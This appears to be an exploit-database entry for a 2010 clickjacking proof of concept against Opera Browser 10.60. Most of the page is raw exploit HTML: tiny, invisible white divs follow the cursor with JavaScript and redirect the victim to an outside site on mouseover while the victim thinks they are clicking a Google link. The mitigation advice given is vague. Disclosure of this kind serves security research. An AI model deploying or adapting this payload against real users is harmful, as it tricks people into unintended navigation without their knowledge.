header-logo
Suggest Exploit
vendor:
Opera
by:
Pouya Daneshmand
7,5
CVSS
HIGH
Clickjacking
693
CWE
Product Name: Opera
Affected Version From: 10.60
Affected Version To: 10.60
Patch Exists: NO
Related CWE: N/A
CPE: o:opera_software:opera
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Opera Browser (V10.60) Clickjacking

This vulnerability allows an attacker to trick a user into clicking on a malicious link or button by overlaying it on top of a legitimate link or button. This vulnerability affects Opera Browser version 10.60.

Mitigation:

The best way to mitigate this vulnerability is to ensure that users are aware of the risks of clickjacking and to ensure that they are not tricked into clicking on malicious links.
Source

Exploit-DB raw data:

<html>
<style type="text/css">
</style>
<body>
<p align="center"><code class="xml plain"><font face="Calibri" size="6">
Opera</font><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"><strong>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.google.com" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">Go to the google.com</font></a></p>
<p><br>
</p>
<div class="style1" id="open0"
style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px none; left: 354px; top: 146px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

Navigation

Suggest Exploit

Services By CQR